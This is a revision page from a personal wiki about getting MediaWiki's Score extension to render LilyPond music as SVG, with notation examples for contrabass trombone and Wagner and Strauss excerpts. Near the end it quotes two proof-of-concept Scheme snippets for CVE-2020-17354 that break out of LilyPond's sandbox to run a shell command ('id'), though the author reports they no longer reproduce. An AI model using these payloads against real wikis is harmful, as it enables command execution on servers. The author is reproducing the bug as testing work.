Difference between revisions of "Score testing"

From Jon's Wiki
Line 48: Line 48:
 
</score>
 
</score>
  
== CV-2020-17354 ==
+
== CVE-2020-17354 ==
  
 
See [https://phabricator.wikimedia.org/T259210 T259210]. Looks like either the syntax of the vuln PoC needs updating, and/or they've been fixed. Can't reproduce as currently stands, with LilyPond 2.19 (Buster), MediaWiki on REL1_39 and Score on master.
 
See [https://phabricator.wikimedia.org/T259210 T259210]. Looks like either the syntax of the vuln PoC needs updating, and/or they've been fixed. Can't reproduce as currently stands, with LilyPond 2.19 (Buster), MediaWiki on REL1_39 and Score on master.

Revision as of 02:22, 20 January 2023

Unreadable Score extension output in dark mode

Hopefully I can get the Score extension working to produce SVG output on upstream task T49578. The transparent PNG image normally produced needs white background styling otherwise it's unreadable in dark mode.

Update December 2022
my patch was merged! :) now we wait for it to be tested and deployed into Wikipedia. There are a few other issues, including some security and sandboxing concerns, e.g. CVE-2020-17354 (see below). Also, this wiki is running on a 32-bit Debian 10 (Buster), which has LilyPond 2.19 (32 bit builds not supported after 2.22). I'm not game enough to try and compile LilyPond myself, and I'm not even sure Scheme 2 runs in 32-bit(?) so I'm testing the SVG Score output over on my test instance (which is not guaranteed to be up at all times).

Examples

Range of the contrabass trombone, as used on Wikipedia:


  {
    \new Staff \with { \remove "Time_signature_engraver" }
    \clef bass \key c \major \cadenzaOn
    \ottava #-1 \tweak font-size #-2 fis,,,1 \finger \markup \text "poss."
    \ottava #0  c,,1 \glissando d'1
    \tweak font-size #-2 f'1
  }

The Spear motif from Das Rheingold:


  \layout { ragged-right = ##t \context { \Score \omit BarNumber } }
  \relative g {
    \override DynamicTextSpanner.style = #'none
    \override Hairpin.minimum-length = #5
    \clef bass \key c \major
    g2~ \ff g8 f8 e8. d16
    c4 b a g  f e d c  \break
    b a g f  e1~ \dim\!  << e1~ { s2 s4 s4 \> } >>  e4 \! \p r4 r2
  }

The Summit from Eine Alpensinfonie, which may or may not be a contrabass trombone excerpt, but probably ought to be:


\relative c, {
  \time 4/4
  \clef bass
  \key c \major

  r2 r4\ff g\tenuto
  c2.\tenuto c4\tenuto
  g'2.\tenuto g4\tenuto
  c1
  e2~ e4.. b16
  a1
  g1
  c8 r8 r4 r2
  \bar "|."
}

CVE-2020-17354

See T259210. Looks like either the syntax of the vuln PoC needs updating, and/or they've been fixed. Can't reproduce as currently stands, with LilyPond 2.19 (Buster), MediaWiki on REL1_39 and Score on master.

1. PoC from task:

 \header { tagline = ##f } 
{
  \relative { c' }
}

#(begin
  (define location 1)
  (display "With output-def-scope\n")
  (eval '(system "id") (ly:output-def-scope #{ \midi {} #}))
  (display "With output-def-lookup\n")
  ((ly:output-def-lookup #{ \midi {} #} 'system) "id")
)

2. Notehead stencil hack PoC, contributed in comment from LilyPond developer Han-wen Nienhuys:

 \header { tagline = ##f }
{
  \override NoteHead.text = \system
  \override NoteHead.stencil =
  #(lambda (grob)
    ((cdr (assoc 'text
	   (cadr (ly:grob-alist-chain grob '())))) "id")
    #f)
  c4

}